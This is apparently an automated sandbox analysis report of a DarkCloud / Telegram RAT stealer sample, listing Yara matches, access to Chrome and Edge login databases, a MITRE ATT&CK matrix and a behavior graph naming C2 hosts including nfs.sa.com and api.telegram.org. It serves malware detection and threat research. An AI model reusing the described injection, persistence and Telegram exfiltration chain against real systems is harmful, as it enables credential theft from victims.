                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeQueries volume information: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected DarkCloud
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3d6cec8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.RegSvcs.exe.403580.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3d69948.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3dc6ee8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.477e2c0.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.4834880.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.47d82e0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.47db860.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.4781840.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3dc6ee8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.47d82e0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.4834880.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.477e2c0.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3d69948.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3dc3968.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3dc3968.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3d6cec8.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3f96948.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.4781840.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.47db860.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3f96948.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.2559323570.000000000042B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1706563691.00000000047D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1706563691.0000000004831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1502068174.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1706563691.000000000477E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1502068174.0000000003DC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1502068174.0000000003F94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: g44YQtTyjN.exe PID: 3036, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8760, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ECmmsbHOaKPh.exe PID: 8812, type: MEMORYSTR
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 17.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3d6cec8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3d69948.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3dc6ee8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.477e2c0.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.4834880.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.47d82e0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.47db860.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.4781840.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3dc6ee8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.47d82e0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.4834880.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.477e2c0.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3d69948.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3dc3968.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3dc3968.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3d6cec8.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3f96948.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.4781840.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.47db860.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3f96948.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.1706563691.00000000047D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1706563691.0000000004831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1502068174.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.2559302757.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1706563691.000000000477E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1502068174.0000000003DC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1502068174.0000000003F94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: g44YQtTyjN.exe PID: 3036, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ECmmsbHOaKPh.exe PID: 8812, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 9112, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3d6cec8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3d69948.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3dc6ee8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.477e2c0.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.4834880.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.47d82e0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.47db860.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.4781840.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3dc6ee8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.47d82e0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.4834880.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.477e2c0.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3d69948.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3dc3968.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3dc3968.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3d6cec8.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3f96948.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.4781840.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.47db860.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3f96948.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.1706563691.00000000047D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1706563691.0000000004831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1502068174.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1706563691.000000000477E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1502068174.0000000003DC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1502068174.0000000003F94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: g44YQtTyjN.exe PID: 3036, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ECmmsbHOaKPh.exe PID: 8812, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected DarkCloud
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3d6cec8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.RegSvcs.exe.403580.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3d69948.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3dc6ee8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.477e2c0.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.4834880.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.47d82e0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.47db860.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.4781840.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3dc6ee8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.47d82e0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.4834880.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.477e2c0.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3d69948.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3dc3968.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3dc3968.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3d6cec8.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3f96948.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.4781840.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.47db860.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3f96948.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.2559323570.000000000042B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1706563691.00000000047D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1706563691.0000000004831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1502068174.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1706563691.000000000477E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1502068174.0000000003DC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1502068174.0000000003F94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: g44YQtTyjN.exe PID: 3036, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8760, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ECmmsbHOaKPh.exe PID: 8812, type: MEMORYSTR
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 17.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3d6cec8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3d69948.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3dc6ee8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.477e2c0.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.4834880.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.47d82e0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.47db860.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.4781840.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3dc6ee8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.47d82e0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.4834880.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.477e2c0.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3d69948.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3dc3968.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3dc3968.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3d6cec8.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3f96948.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.4781840.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ECmmsbHOaKPh.exe.47db860.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g44YQtTyjN.exe.3f96948.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.1706563691.00000000047D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1706563691.0000000004831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1502068174.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.2559302757.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1706563691.000000000477E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1502068174.0000000003DC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1502068174.0000000003F94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: g44YQtTyjN.exe PID: 3036, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ECmmsbHOaKPh.exe PID: 8812, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 9112, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		412
                    Process Injection                    		1
                    Masquerading                    		1
                    OS Credential Dumping                    		11
                    Security Software Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Web Service                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Shared Modules                    		1
                    DLL Side-Loading                    		1
                    Scheduled Task/Job                    		11
                    Disable or Modify Tools                    		LSASS Memory2
                    Process Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading                    		31
                    Virtualization/Sandbox Evasion                    		Security Account Manager31
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture13
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                    Obfuscated Files or Information                    		LSA Secrets1
                    File and Directory Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                    Software Packing                    		Cached Domain Credentials12
                    System Information Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Timestomp                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1632386 Sample: g44YQtTyjN.exe Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 43 api.telegram.org 2->43 45 nfs.sa.com 2->45 51 Suricata IDS alerts for network traffic 2->51 53 Found malware configuration 2->53 55 Malicious sample detected (through community Yara rule) 2->55 59 9 other signatures 2->59 8 g44YQtTyjN.exe 15 7 2->8         started        13 ECmmsbHOaKPh.exe 14 6 2->13         started        signatures3 57 Uses the Telegram API (likely for C&C communication) 43->57 process4 dnsIp5 49 nfs.sa.com 209.74.88.50, 443, 49697, 49698 MULTIBAND-NEWHOPEUS United States 8->49 37 C:\Users\user\AppData\...CmmsbHOaKPh.exe, PE32 8->37 dropped 39 C:\Users\...CmmsbHOaKPh.exe:Zone.Identifier, ASCII 8->39 dropped 41 C:\Users\user\AppData\Local\...\tmp82D7.tmp, XML 8->41 dropped 61 Uses schtasks.exe or at.exe to add and modify task schedules 8->61 63 Writes to foreign memory regions 8->63 65 Allocates memory in foreign processes 8->65 71 2 other signatures 8->71 15 powershell.exe 23 8->15         started        18 powershell.exe 23 8->18         started        20 RegSvcs.exe 34 8->20         started        27 3 other processes 8->27 67 Multi AV Scanner detection for dropped file 13->67 69 Injects a PE file into a foreign processes 13->69 23 RegSvcs.exe 13->23         started        25 schtasks.exe 13->25         started        file6 signatures7 process8 dnsIp9 73 Loading BitLocker PowerShell Module 15->73 29 conhost.exe 15->29         started        31 conhost.exe 18->31         started        47 api.telegram.org 149.154.167.220, 443, 49705, 49706 TELEGRAMRU United Kingdom 20->47 75 Tries to harvest and steal browser information (history, passwords, etc) 23->75 33 conhost.exe 25->33         started        35 conhost.exe 27->35         started        signatures10 process11

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.